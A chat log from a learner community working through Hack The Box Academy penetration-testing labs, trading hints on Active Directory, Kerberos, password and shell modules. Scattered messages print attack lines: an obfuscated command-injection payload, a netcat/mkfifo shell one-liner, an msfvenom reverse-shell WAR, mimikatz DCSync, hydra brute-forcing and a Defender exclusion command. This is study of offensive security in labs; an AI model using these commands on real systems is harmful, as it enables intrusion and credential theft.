#modules
1 messages · Page 199 of 1
Since assignment 3 I start the payload with that, because it worked every time. Second one because I thought it was necessary.
No not yet, trying out bruteforcing the subdomains I found with dig, is that right?
well it is not necessary right now
and the third, in the base64 cmd is to replace a space char
you can use IFS or tab for that
no just on inlanefreight.htb .
try with both the Pwnbox / your Attack box or reset the target and try again.
Hello. This script doesn't work. It says when running the script that it's not authenticating. How can I fix it:
```
USER user
password
binary
GET ftp.py
bye
```
||bash(base64${IFS}-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)|| gives me no output but a 200 code, with ||%0a%09$bash(base64${IFS}-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=) ||i get the ping results only
is this the script?
make sure that the base64 or bash cmd is not blacklisted
Got the same results whenever i obfuscate them (at least, tried several options). But if it was blacklisted, it should give me an error? Invalid input?
I did it 🥳
Nice! What brought your solution?
Fumbling through enumerating the subdomains and then finding the answer on the forums while I was doing that
I was thinking I had to use a different target dns server but I didn't
had to learn more about what a zone transfer actually is
Google brings too much sometimes. But a good way of checking your way
Recognize that haha! DNS transfers kept me busy for a while
Hey, doing the footprinting MSSQL module. I was wondering if there was a way to use the named pipe to connect to the service from a Linux machine. mssqlclient does not seem to support this
I used impacket-mssqlclient for that, are you missing an important flag for it?
I logged into MS01 using svc_sql. I can access the admin powershell from this user. i tried to install RSAT but it popped an error. I dunno what else to look for
I performed a kerberos but it only returned the hashes I retrieved from the initial foothold
nope I'm talking about within the machine itself, think post exploit pillaging
I dumped lsass and got the cleartext
and username
thanks. I thought since the module is on ad I had to use ad tools. I guess I get why they say to follow the path cuz everything is connected
if only someone wrote a tool to make that process easier 
they have and those are peas and autopwn scripts
but its forbidden
they will make the work easy but they suck the skills from young pentesters and make them sk's
my level is not high enough to afford the backlash of the forbidden scrolls.
peas doesn't have autopwn stuff, and any tool is allowed in cpts
I'm talking about lsass and stuff
ooh those
well I guess I can write a simple ps script for that but nothing complex
Passwords Credential Hunting in Linux 
Maybe I'm tired today but that just took my soul
just crossed another one off. AD skills assessment and currently at 99.17% . Exam getting closer :/
managed to do it without tips or any help tho so feeling a lot better
wdym by logon to? winrm? rdp? or physically logging on?
well here's a list of edges bloodhound collects, filter by those and the username https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html
no, I don't see querying every machine the user can logon to being useful
if you have DA, you can safely assume the account can logon to every machine
and there's no way to check physical logon, rdp/winrm can be disabled but they can still login physically
sharphound has the loop thing which you can let it run for hours and catch hasSession, that's a way to know the user is logged on for sure
can anybody help me with the api key question in JavaScript Deobfuscation, it is showing incorrect answer for the api key
I am really confused with dcsync .\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:INLANEFREIGHT\tpetty /domain:INLANEFREIGHT.LOCAL" "exit" I checked the permissions for this user and still I am getting auth error. I tried to rdp using the creds and hash but it did not give me a session. I then tried to use runas even then its not working any idea why ?
wtf where did the messages go, why am I talking to myself
i love when people delete their messages and remove context lmao
or if a mod did to gaslight you 

Hello, I'm very new and working on my first module. I think I'm on the right track but would love some guidance. I'm on the Firewall and IDS/IPS Evasion - Hard Lab and ran this nmap scan: sudo nmap 10.129.2.47 -Pn -n --disable-arp-ping --packet-trace
This is the output:
```
PORT     STATE         SERVICE     VERSION
68/udp   open|filtered dhcpc
137/udp  open          netbios-ns  Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp  open|filtered netbios-dgm
Service Info: Host: NIX-NMAP-HARD
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1154.52 seconds
```
Now I feel like I should do something with port 137 but that's where I'm kind of lost. I feel like I could do something with the scripting engine but idk what information to feed it to find an ideal means of attack. Am I on the right track or am I getting tripped up on nothing? Also before this scan I did a default scan and saw that tcp 22 and 80 are open. Any guidance would be appreciated.
Has anyone here done the new CRT exam?
re-read the section regarding firewall evasion: specifically - DNS proxying, Syn Scans and source ports are your friend
Thank you, will do.
I'm going to be doing the AD skills assessment probably tomorrow or day after, how was it? Pretty straightforward? Also congrats! You're going to crush the exam!
Okay after re-reading the sections you suggested I got to a point that I know I'm on the right track. I got the service info for port 22 and 80, but for 50000 it came back with tcpwrapped. After changing my scan options I got that it was ibm-db2. But when I use netcat to try and talk with the port it says permission denied.
Source ports are your friend
reading these i feel like such a noob 
it is if you have some experience, SA 1 can be done with 4/5 commands
jesus the pivot they give you for the kerberos attacks module skill assessment is so slow
setting up a proxy just cause its unbearable to use
I was using the right source port but wasn't running it as sudo. That's what the problem was. Thanks for the help.
it helps to actually read the error
Permission denied is usually a bash error
Good to know. I'll keep that in mind going forward.
Hello, I am new here, I want to ask how blocking a Facebook account offended you
?
2 things:
- where is this going?
- this really isn't the channel for that
reading the card explains the card the linked channels, informs you of what the server is about
this server has nothing to do with facebook, nor any social media
hey, u got any update on this? atm i m using trial and error... i think this can't be the way... :/
My only experience is with the AD modules so hopefully that's sufficient, I've been going over each AD section at least twice because I admit it's out of my element a bit but I think I'm getting the hang of it. I was a bit confused last night when I was reading the Kerberos Double Hop problem section but that might have been because it was 4 am and I was tired so gonna look at it with fresh eyes today
all the info you need to finish the assessments are in the module so it's all good. the double hop problem is easy to solve, just don't double hop
authenticate directly
okay so I did understand the section because I kept thinking to myself, "couldn't you just authenticate directly and avoid this entire problem" lol
But I suppose there are scenarios I'm not considering where you'd need to double hop
when you don't have a pivot set up and need to winrm inside a winrm, sure. but you can always load rubeus and inject a ticket
^
right that makes sense. This module is really teaching me how little I know about the Windows OS lol
I mean it's also showing how dumb it can be
but AD is good for permission delegation ¯\_(ツ)_/¯
i can help u
I mean there's nothing inherently insecure with AD, as with all configurable systems, it all depends on how it's set up. ex. even the best edr can be made useless if it isn't configured properly
For the Kerberos Attacks skill assessment is it supposed to be that all the impacket scripts return ldap errors even with valid credentials or am I just doing something grossly wrong?
yup, netexec can use the same creds and talk to the DC over SMB and LDAP just fine
its literally just the impacket family that is complaining with the same creds
doesnt matter if I do it from my host or the provided attack host either
weird, I don't think I used impacket for the SA
```
[-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906B5, comment: AcceptSecurityContext error, data 52e, v4563
```
the error in question
the invalid credentials are misleading though as they def work. Google suggests its an issue with the ldap library impacket uses possibly.
Guess ill just have to mess around without impacket
you don't need impacket for that I think, but maybe reset the lab
I may be having a slow day:
Password Attacks -> Windows Lateral Movement
-> Pass the Ticket From Linux
I am having issues accessing the david@inlanefreight.htb account - My steps below:
- add the spawned machine ip to /etc/hosts with inlanefreight.htb
- attempted to access via domain name with user provided
-> ssh david@inlanefreight.htb -p 2222 # type yes and the password provided by HTB - not able to log in - Attempted to access using the username@ip-addr -p 2222 > yes > password given by HTB
Not able to get access. Is there something I am missing?
Oh yea, I did reset the machine, my kali vm, and the vpn connection.
i thought it was inlanefreight.local, not inlanefreight.htb
but i could be wrong, it's been a minute
Copied straight from HTB
SSH to 10.129.215.16 with user "david@inlanefreight.htb" and password "Password2"
also wdym password provided by htb? the only password provided is for htb-student
ahhh
they may have changed that section or i missed it
¯\_(ツ)_/¯
@fathom pendant Most modules I've recently done have been inlanefreight.htb, with the exception being the AD module which has been exclusively inlanefreight.local
it's been a minute since i've done that module
so i couldn't recall if they used .htb or .local
what other modules use .htb? I don't remember seeing it
also the username would be david@inlanefreight.htb@ip
just as the fyi
I'm doing all the modules in order and almost any module I can remember before the AD enumeration & Attacks module was using .htb
It messed me up at first cause I assumed in the AD module it was .htb and didn't read carefully that it was something different
a lot of them use .htb as just the standard tld for them
Thanks a bunch. Wasn't aware of that. david@inlanefreight.htb@ip-addr
yes because it's a domain user
i would suggest the academy to use other TLDs like .gay or .hom
It's always been .htb for, me, but I have only been at this for a month or so
that's for boxes, don't remember those in academy tbh
yes
are BoF modules good for OSCP prep?
most modules, especially the more web related ones, will use the .htb
i don't think BoF is on OSCP anymore
I heard it wasn't anymore as well. Wonder what the replacement will be.
a friend said that it depends, if you are lucky or not
Over 300 results for .htb in my obsidian notes for HTB academy it was used a lot in the earlier modules for sure
i mean; you can easily google the pen-200 course
bc they change the machines every month or smth
there isn't
and find all the covered domains
you could only still find it before they transitioned to the new AD set
thats cool
my small brain wasnt able to learn all of that
so the CPTS course should cover everything
it covers most things that would be on OSCP
Speaking of OSCP if I read this correctly you're not permitted to use MSF during the exam, and this might sound like a really simple question but there's been a lot of HTB modules that rely on MSF to set up a multi-handler listener to catch shells. How would we do that without MSF? Netcat?
i think there's like a few differences
you can do a lot of things without msf
msf is mostly just a collection of PoC exploits ¯\_(ツ)_/¯
what i cannot even use multi-handler?
Yeah I've been trying to not use it at all tbh, but I was just doing a module and I realized I don't know how I would set up a multi-handler listener without it which seems like a pretty important thing to know how to do
netcat works
Don't take my word for it, I just remember reading on their website that certain tools like metasploit aren't permitted so I assumed that would also encompass the multi-handler listener
pwncat-cs works
you can use it for one target
Okay that's what my first thought was. I'll have to look into pwncat-cs put that in my toolbox
same for me
pwncat autoinjects a stable shell in to the listener
I can generally answer anything about the OSCP as a former OffSec employee if needed
Feel free to DM
i.e. saves the whole python3 -c 'import pty;pty.spawn("/bin/bash");' thing
oh that's cool, I gotta try that
pwncat also has some recon tools
nah im gonna build my own listener in rust idc
there's already a rustcat 
mine will be better
Can I pay for the OSCP exam with an organ, I think that would be cheaper 
See if they will accept it, bribes@offsec.com
are you able to comment your thoughts on them increasing the exam difficulty, but not so much on updating the materials
I think the increase in exam difficulty is subjective. For some, AD is much easier to understand then that of a BOF which you more then likely will not be doing unless you are going into binary exploitation and such. For others BOF was super easy.
I made a little progress but Im not sure how I can do the next step without impacket unless Im expected to spin up a windows host.
Really just a matter of what does the individual struggle with more
yeah it's subjective but I think they increased the overall difficulty for the latest sets, not just about a specific topic
which question
Difficulty is just a subjective thing though so hard to say.
Honestly in hindsight I don't think my exam was that difficult
in-between the which user allows you to connect as admin to the server with unconstrained delegation and the next one.
I know the user because bloodhound still worked, and I know what attack I ought to do to gain their creds. But the main tool for it is impacket related.
Im looking at some alternative tools now that arent in the module to try them out.
I think its also the "luck of the draw" on what you get host wise and then do you have weaknesses that unfortunately come to light on your exam from your exam host set
And that was supposed to be the impenetrable set
I think it was a little far fetched, but it's not too uncommon
isn't it just winrm/rdp into that server and do the unconstrained delegation attack
I dont have the pass for the user to rdp into yet
I just have the username
ah, what attack can you do if you have a username
kerberoasting
yeah, netexec can do that too
it's definitely not difficult, just imo the oscp materials doesn't come even close to preparing you for it
yeah will try that out, my pwnbox instance reset on me(im at work lul) so Ill have to reset up some things
Im just curious what the intended route was because the module was before that was added
this is true, you can get unlucky and get a more difficult set
I thought cme can also kerberoast, it's not just a netexec thing
howdy folks can someone who's completed doc and reporting verify my svc_reporting hash real quick in a dm, hashcat isn't recognizing it
The course not so much no, but I do think the mock exams are fairly similar to what you can expect
darn apparently I have actual work to do
parts arrived. ill have to return to the assessment later
I honestly don't remember anything about the mock exams to agree or disagree so I'll take your word for it 
Which assessment?
Kerberos Attacks. Has some oddity in it
Lol yeah no need to spend more time on it now
What's wrong with it? I remember helping someone else with it
pretty please with cherries on top
impacket just doesnt work for some reason
What part?
any part. impacket straight up doesnt authenticate properly
what hash is that, you can just send the first part
svc_reporting:7608:aad3b435b51404
hash type?
hey folks, been struggling with the last question for Kerberos Attacks: Skills Assessment. I managed to catch j*k krbtgt but when i try to access the \DC01\Secret Share\flag.txt it tells me the network name cannot be found. What am i not getting this time?
just take the part after 7608:
aad3b435b5140...:nthash
You have creds yet or?
the aad... is also typically an empty part of the hash, id skip it and use the next part of the hash.
yeah, even ran bloodhound with em.
A user or D user?
i think it's both, I'm spinning up the lab to test it out
d user, working on a user
have you done the unconstrained delegation attack?
have a couple diff tools I can try out if work slows down again
getting token length exception when i do -m 1000
but its weird impacket doesnt work
did you
1: copy the whole hash
2: make sure you're using the right mode
how do you think the lynda.com people will influence the lab environment there? any insights or did you leave before they got on board?
i'm pretty sure it's ntlmv2 not ntlm
their labs are so terrible but the community is excellent
I was attempting PtH attack, seeing that the only tool present on the host is Rubeus (i thought it means that that is all that's required) and while monitoring with it i got the user's ticket
he said it's from ntds, so -m 1000 is correct
I was let go in January 2023 so I think that was before lynda or whatever got involved
well the question specifically mentions unconstrained delegation
not working maybe wrong hash lsass dump transfer is taking forever and a day
and rubeus is the tool they teach for that attack type too
ah missed that part
fair point, my bad. Thank you
huh lsass and ntds won't give you the same data
yeah i was gonna try again with what i get from the extraction since the dump from ntds isnt working for me
have you done the module can i dm to compare with what i got
I don't have the raw hash, it should be something like aad3b435b51404eeaad3b435b51404ee:a1a9bb19bc5cfa482120111111d97417
just to confirm, we are required to upload other tools? My reasoning is: if there is already Rubeus but nothing else it means that thats's the only tool needed.
rubeus is all you need
ok yeah I'm getting the same error
ok cheers
yeah afaict its to do with the ldap library they use that doesnt support some AD setting.
hello , im on the shells and payloads module and trying to set a bind shell but i try to bind a bash shell to tcp session using : `rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l [IP] [port] > /tmp/f`
it doesnt seem to be executed
is it because of my pc?
that's a revshell, not a bind shell
it literally says a bind shell in the bind shell section :0
oh oops yeah it is, never used it before
so if it's a bind shell once you start it, it will listen for a connection
...wait why are you running it on your host
lol
I'm missing something. So while on the S****01 I monitor with Rubeus and catch j** tgt. I renew it, then i ask for tgs to the cifs of dc01, and I get it. But i still cannot access the Secret Share. I'm using the steps from the lesson on the unconstrained delegation. Please help
you don't need to specifically request a tgs, renew the ticket to have it injected then just access the share
I just copied it and turned it into a ccache
with /ptt right?
i can see the ticket in my cache (klist) but it still won't let me access the share
you pulled something out of an NTDS file but can't crack it?
i got it thanks
ah ok
what's the error
The network name cannot be found
well did you make sure the network name is right?
Take it to DM if you want to share specifics please
hi g0blin
Yo, how're things?
pretty decent, started a 5 week course "Intro to PC Operating Systems"... So far it's just been winders
Well I hope it gets interesting. Not to say Windows isn't interesting, but on the name of the course.. unsure it'll go very deep
Is it a security focused course, or just like an introduction?
just an intro stuff; basics - minor background on OS stuff
some silly definition stuff
differences like 32-bit being limited to only 4GB of memory
Is this a stepping stone to another course or something, or it just grabbed your interest?
stepping stone for cybersecurity stuff
another course i'm taking is Intro to Psychology
Nice, is this on OpenUniversity or something?
nah; it's through Miller-Motte University. Exp graduation in early 2025
That's not how it works..
I mean technically it is offtopic.....
but if theres anyone thats allowed to break the rules its you

There's no offtopic rule 🤷‍♂️ But ok
Just enjoy engaging with people, wherever it is.
People have been muted/booted here before
yeah thats the core of it
Well I guess I'll shut up then
Usually its just us having to tell some unverified person to verify to access the general chat
and its a 75/25 split of either raging or actually following instructions
hey can anyone help me crack a hash
Getting weird results in active directory. I am not getting a transfer from my python http server with:
Invoke-WebRequest -Uri "http://<ip>:8080/chisel.exe" -OutFile "C:\chisel.exe"
but after I do
Invoke-WebRequest -Uri "http://<ip>:8080/PowerView.ps1" -OutFile "C:\PowerView.ps1"
I do Import-Module .\PowerView.ps1 and am then able to transfer chisel. The PowerView transfer works first try no problem
Why?!
PowerView.ps1 isn't imported before I transfer PowerView, so I'm not sure what's going on!
Hello guys can anyone help me with this module WINDOWS EVENT LOGS & FINDING EVIL i am quite new to windows event logs i thought i created the correct view and still cannot solve it
i can
which part are you on ?
in powershell do Add-MpPreference -ExclusionPath . and it should save there.
i am on the very first part
i created a custom view showing only events that changed the policy
this is the exact question: Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe
i created a filter based on the computer name that was relevant to the event that took place on 8/3/2022 and only showed audits from that computer
I tried that but there is no logs under that id
Username from question 5 and password from question 6 of the Active Directory Skills Assessment 1 does not give RDP access.
one sec i'm spawning the instance
bet
BloodHound GUI node information is cut off, any way to fix this? Hasn't been reported on the github issues page but I wanted to check if anyone has a fix first before posting
and it's formatted weird
filter for event 4907 and use the date in the question to find your way to the answer.
Anyone have a hint on the last question of AD Skills Assessment 1? I am trying to RDP in with the tp***y credentials, but it is not working.
I tried all three ip addresses, even the DC01, just to be sure
you gotta tunnel and pivot if you havent
and i believe tpetty was meant to get admin's hash not rdp, the rdp is with admin
Anyone else having issues spinning up targets in any of the academy modules?
I was just about to ask this,
I can't get any targets to spin up
Haha ok, so I'm not nuts
Same, refreshed. Logged out and back in. Nada
Darn it, I'm on a roll also
it's working for me
Which module you on? I'm on the linux priv escalation one
kerberos attacks, I can try spawning yours in a sec
Having similar issues with Nibbles - Enumeration, its been "deploying" for awhile now and I cant stop it..
my target is spawning for a while alr.
ok, same results in other labs for me. Just tried spinning up the assessments in the nmap module. Same results. Just spins and doesn't come up
can already for mine
oh wait, they just came up. someone rebooted something lol
So I ran secretsdump for the Administrator user for the DC01 ip address. I am kind of stuck here now.
Do I kerberoast at this point? The DCSync Module dead ends
yeah it spawns fine, you can try switching servers if you run into the same thing next time
refresh the page
Or should I try to crack the hash?
It came up eventually, but it took an unusually long time.
You're now using the right tool but I sincerely suggest that you go over the module as it seems you are rushing it and not soaking in the material.
Which module? I hit a dead end.
At least with the dcsync module
I got the kerberos tickets, but there was no plain text
hi I am logged into this IMAP server for the IMAP/POP3 section of footprinting. I'm trying to get the administrator's email address. Attached is what I have tried so far.
can someone help?
I managed to log in as another user besides admin via sslconnect
Help In what way
I want to figure out the administrator email address. Please don't give me the answer but I have been stuck on this for a few days and could use a push in the right direction.
that would be great please
No way I'm busy person
Why is this not working?!
I imported PowerView.ps1
I'm trying to finish DCSyncing the last question of the AD Skills Assessment 1
then why even reply 
How do I finish DCSync? I have run secretsdump, but can't get anything in my powershell to work
it's been a while, if I remember right, authenticate to the email server and poke around. also take a look at this https://www.atmail.com/blog/imap-commands/
Which one of these do I use?
I can't seem to find the right hashcat mode for any of them. Just want to make sure I am looking at the right ones.
what can do you with a ntlm hash besides cracking it
which one is the ntlm, the one with 500?
I'm thinking pass the hash? Can't figure it out though.
The one you're currently on, footprinting, and attacking common services
So I was able to figure it out, did a pass the hash with psexec, had to go back to the password attack module to figure it out
So the first hash here, what kind of hash is it? Looking it up online it showed as MD5.
I thought it was an NTLM
could be the LM portion of the NTLM hash
:) usually with pth you use the NT bit
maybe pay attention to the modules https://academy.hackthebox.com/module/74/section/1350
that one's in the infosec fundamentals path; it's not in the main pentester path
oh is it not
it is indeed not
seems like fundamentals are missing then 
the only other prereq path it's on is the soc analyst pre-req path
I just used the whole hash of the output from secretsdump
The first one pictured. I cut off the remaining portion in the screenshot for spoilers
It worked
Just trying to understand why because the module used a different format and really didn't go in to detail
the lm part of the hash is usually a blank hash, it's just a shortcut to let impacket know without having to paste the whole thing
The module that Xre0us linked explains all of that. Maybe go over the Information Security Foundations path before continuing the Penetration Tester path.
When does MS anything care about capitalization? But to answer directly, no yes.
you mean I can run rEgEdIt.eXe and it doesn't care? who knew
LM hashes are case insensitive. NTLM are def case sensitive.
isn't that only the lm hash/password?
yeah the nt hash is case sensitive
i knew one part was ¯\_(ツ)_/¯
Oops, yes >.<
Anybody able to get Password Attacks - Pass The Hash target to spin up?
change vpn regions
how do i access the targets
Shells & Payloads
Page 16
The Live Engagement
you're given a linux attack host to rdp into
if you're referring to the web targets: firefox works
ik but firefox isnt there on the attack host
yes it is
run firefox in the command line
also make sure you take notes of the desktop ;)
oh i c danke
what happened
Hi all, I need a little help and info on Module: Linux Privilege Escalation : section SUDO lab. I am trying to compile the exploit as per the info the section provides but i am getting a glibc6 error saying the c file cannot be compiled because the glibc library is missing. I am following this process to create the binary.
```
cry0l1t3@nix02:~$ git clone https://github.com/blasty/CVE-2021-3156.git
cry0l1t3@nix02:~$ cd CVE-2021-3156
cry0l1t3@nix02:~$ make
```
is there a problem in the lab target machine or something?
how are you cloning it; afaik the target machines don't have internet access?
does anyone know my ip address for that
```
└──╼ $msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.129.204.126 LPORT=4444 -f war > shell.war
Payload size: 1091 bytes
Final size of war file: 1091 bytes
┌─[htb-student@skills-foothold]─[~]
└──╼ $nc -lvnp 4444
listening on [any] 4444 ...
```
i upload to tomcat then go to the tomcat ip address/shell
but it not give the shell back to me why?
got the download on my attack box, launched http server , wget on target box.
gotcha
use a different LHOST, perhaps the one on the same subnet
do ifconfig to see all the interfaces
followed two scenarios. 1. Downloaded precompiled binary to target. error saying glibc6 missing. 2. Downloaded post compiled binary , same error target box has glibc 2.27 and needed is 2.34
i cannot download glibc as apt get install not in my rights on box
can you not do a static compile?
yes, i cannot do the compile on the target box
this is not the path you need to follow to get the flag for the sudo section
i know it must be straight forward , just download binary , compile run and be root but target box is stopping me by not allowing me to compile the hex.c code
listen to dpgg he's actually done it
@autumn pilot any advice on this please
i've given you
choose a different path
```
msf6 exploit(50064) > exploit
[-] Exploit failed: NoMethodError undefined method `split' for nil:NilClass
[*] Exploit completed, but no session was created.
```
restart msfconsole
sometimes it's dumb
literally this
there are 2 exploits given in the section, check the sudo version to find which one to use
i restarted but its the same answer
did you set all the options?
yes
```
   PASSWORD   admin123!@#   yes   Blog password
   Proxies                  no    A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.1.12   yes   The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80            yes   The target port (TCP)
   SSL        false         no    Negotiate SSL/TLS for outgoing connections
   TARGETURI  /             yes   The URI of the arkei gate
   USERNAME   admin         yes   Blog username
   VHOST                    no    HTTP server virtual host

Payload options (php/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   LPORT  4444             yes       The listen port
   RHOST  172.16.1.12      no        The target address

Exploit target:

   Id  Name
   0   PHP payload
```
i think this one requires you to set an additional option
got this @next bronze
set VHOST
ye
Module : INTRODUCTION TO ACTIVE DIRECTORY
Question:
why Domain Controllers are Global type?
why the need change in another Domains?
can Domain Controllers control Resources in another Domain and why the need for that? in which Usecases?
what
Domain Controllers only control their domains, and are linked via forests
then why are their Groups Global typed?
interdomain trusts
allows them to control certain aspects of other domains but not full control
make sense, thanx
Many thanks @Xre0uS , @fathom pendant , @autumn pilot for pointing me in the right direction. I was banging my head on this for the 2nd day.
sudo issue
got it working.
ask to dm
don't just dm without asking for permission
u right .
i just did not want to write a long question here in the group.
That's what this community is for
You can ask your questions about modules here at any time
people will be much more willing to help if you actually post your question
what do you need help with?
Hi guys! Any ideas why I can never access a Python server hosted on my Kali machine. I use the tun0 IP and port number to try to browse from the target but no es bueno
It works fine when I serve it from Pwnbox
I do have uncomplicated firewall but have tried turning it off 
did they make changes to pwnbox. there are way more interfaces than before
probably didn't turn it off right, either turn off completely or explicitly allow specific ports
Thanks!
Anyone i can dm for skills assessment 2 part 1? I have a list of users just cant seem to find the passwd on the active directories module
AD enum & attaks SA 2 q1?
yup
what are some ways you can get a username and hash if you don't have domain credentials
you're already in the internal network
as-rep roasting or password spraying is what im thinking
but havent gotten it yet so its probably something else
i have the username list from kerbrute
so i have a list of usernames and emails that im trying to as-rep roast or passwordspray. Tried a few passwords, but im afraid to lock out the users so i didnt try more on that
you can also try listening to the traffic
so ||LLMNR||?
hello , wondering if someone knows why some techniques work when I am in the internal network , and do not work when I use pivoting with tools like ligolo ?
would think they would connect back to me tho. I figured i needed some way to force that connection @next bronze
recall how poisoning works, it could be a broadcast
by force i mean like a writeable smb share that i can upload scf or lnk files to
so correct me if im wrong. When they get a ip/domain they dont know, they ask "Hey, who is the owner here?" and responder picks it up and says "yo gimme dat shit"
just more pro over a network
yeaaah
for any kerberos related things you need to add the fqdn of the dc into your hosts file
that went over my head
with the ip of the pivot host ?
thanks. I dont know why i didnt test that prior
no with the actual ip
the ip of the target ?
this can work but it's another mechanism, it's just an NTLM authentication in this case
the KDC is on the DC so that
thank you bro , it works
Password Attacks - Pass the hash - Can somebody explain this concept to me please. I performed a pass the hash attack and gained access to julio's account but now which machine am I setting up the listener on? which machine am I inputting the rev shell command etc. Thanks in advance
im so lost rn. I have the username and password. But i cant login. How am i supposed to get access to this machine lol
check what services are open that you can use
yeah i know. I feel like i have 100 times now
i guess you are in MS01 , as mentioned the DC01 can only connect to the MS01 (which is your machine rn ) , Invoke-TheHash will allow you to run commands on the target (DC01 in this case ) using the hash , so you will create a listener on your machine MS01 , and run the rev shell on DC01 using Invoke-TheHash , you can always use hostname to figure out where you are
Followed the steps in the module and I cant get the reverse shell. not sure what Im doing wrong
is the ip and port correctly configured
yeah , just make sure the ip and port are correct
After running the script 3 times, it finally said "connected" and when I hit enter again the shell prompt popped up
looks like it was just taking a minute to load
Can I DM sm1 about Windows Privilege Escalation Skills Assessment - Part I ? Can't figure out why i cant pe using SeImpersonate...
why not? try juicy potato, use different clsid
already tried all clsid that i could find for this version of windows, also tried juicypotatong & printspoofer
The questions for the assessment seem to indicate that im supposed to find a password before the privesc, however i would like to understand why all these exploits arent working
does the user have seimpersonate
it does
then it should work
I have no idea what is going on, I wanted to double modulate everything...
Did you have any trouble getting access to shares? I did the reverse shell part but I can't find why I can't access david or julio's shares
Theres a command to check files in that network
You need to pth first then using the compromised session, check the files
If that makes sense
You did that through rdp? I tried through my evil-winrm session but the mimikatz prompt is spamming the prompt then crashing through this way
do you remember if it is the intended way ?
pth through mimikatz
Anyone who is doing/has done AD Enumeration & Attacks - Skills Assessment Part II
finding MS01 really slow ?
Let me try it
finally got it working after enabling SeAssignPrimaryToken and running juicypotato in CreateProcessAsUser mode. So weird its not working with SeImpersonate
Hello everyone hope yall doing great on this beautiful day todayyy. I was working on the command injection module on the new job path and got stuck on the pdf generator section. I was able to find the internal api but I don't know what to do from here. A nudge in the right direction would be awesome.
Struggling with the attacking DNS module. Attempting to run subbrute on it and keep getting traceback errors. Any idea why?
com and htb are two different top level domains.
The resolvers.txt file should only contain the IP of the target
This password attacks module is by far the worst in CPTS, holy christ :<
lmao its rough but fun
it's long maybe hard but very useful
im on the password mutations part, can anyone please confirm 89230 being the right amount of words in the mutated list
having so many issues with disconnects bruteforcing ftp already...
all I did was mutate the given password list using the given rules -> filtered out any passwords under length 8. Gave me 89k passwords
mine is around 94k
interesting..
did you alter in the custom.rule file or?
or did you just mutate with the given custom.rule file without any changes
oh, i guess you didnt remove passwords, i get 94k too with my original file
i guess ill use that instead then and not filter out any passwords under 8 length
mine was also 94044
I used the provided mutation rule
Please do not post any flags here, your flag has a typo. That's why it doesn't work
The flag has a typo in the database. Your site, support , and staff are all terrible. I have not once signed on to this platform with out encountering problems.
I am sorry if you are having problems with the site.
In this case, please contact support.
We all know you'll be back on the platform tomorrow
Wasn't talking to you
With that said, how do I get around this issue:
hydra -l sam -P new_list ftp://10.129.64.95 -v -t 32 -I
[DATA] max 32 tasks per 1 server, overall 32 tasks, 94044 login tries (l:1/p:94044), ~2939 tries per task
[DATA] attacking ftp://10.129.64.95:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Disabled child 0 because of too many errors
[VERBOSE] Disabled child 3 because of too many errors
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
inb4 this is the blindsql section....
congratulations on finding yourself
?
Finding myself?
ive been trying to find myself for years
@ember coral @limber river how many threads did you use in hydra? And on the attackbox or VPN? Getting sick of connection errors...
I think you had to use like 48 or something? i forget but i remember reading it on the forums
I use vpn with -t 16
- don't spoil on others
It's not spoiling though. Thats straight from the cheatsheet
yep even 16 threads gets me insta connection errors
im going to exploDEEEEEEEEEEEEEEEEEEEEEE
Module: File Transfer
Trying SMB upload to share made by wsgidav
Command:
sudo wsgidav --host=0.0.0.0 --port=8887 --root=/tmp --auth=anonymous
I used:
my kali:
dir \\10.10.15.204:8887\
On windows box:
copy C:\Windows\System32\drivers\etc\hosts \\10.10.15.204:8887\
I think there is a problem with the share name. What is the share name for the share I created
The dir command on Linux doesn't understand things like SMB shares.
Is the Attacking DNS , running subbrute supposed to take forever? lol its finding results but been running over 30 minutes now
If you want to access the share from a Linux machine, you'd need to mount it first
Someone please correct me if I'm wrong
either mount an NFS OR use smbclient to reach it (if it's smb)
use a small list
also with SMB; you need to specify a sharename
anyone whos actually in the field, whats the usual length of your reports, what are your reports usually composed of, any tricks or tips or cheats with writing reports? trying to hone this skill before I take the test
But even if you see the copy command I used on the windows box that didnt work either. It said the share was not recognized or something
If I didn't include the share name then the root "/" should be sufficient right? But it is not sufficient
That's not how SMB shares work
You're connecting to a computer. The computer has shares, which relate to a shared path on the computer.
it likely defaulted to "Share" or something like that
Do u have an idea about what th share name could be
you'd have to look up wsgidav documentation
if that's the command given in the module: then it should show you the sharename it might expect
Oh true, this
though usually you'd use smbserver to spin up a temp SMB server
never really thought of using wsgidav
damn, is it the EU peak hours messing with the infrastructure?
my best guess would be: that the sharename might be tmp
Thanks but I tried that and no luck
If it helps this is the error I get:
¯\_(ツ)_/¯
also windows can be weird
do this on your kali:
smbclient -L -U "" 127.0.0.1 -p 8887
see if it'll list shares
how to start with coding or hacking?
smbclient is a tool specifically for interacting with SMB/CIFS servers, not WebDAV servers. WebDAV and SMB/CIFS are different protocols used for network file sharing.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
¯\_(ツ)_/¯
use 4 \
In which module, which section?
\\\\ip\\
It's asking for the password for the workgroup of my vm. Its the HTB browser vm
just hit enter
if anonymous mode is on: just hit enter
Not enough \ characters in service
also it looks like wsgidav hosts a web service
so try navigating to https://127.0.0.1/8887/ ?
https://www.itweb.services/tutorials/linux-guides/deploying-webdav-on-debian-10-using-wsgidav/ < this is what i found on the internet
wsgidav is the fileserver being used to copy files via SMB to the host
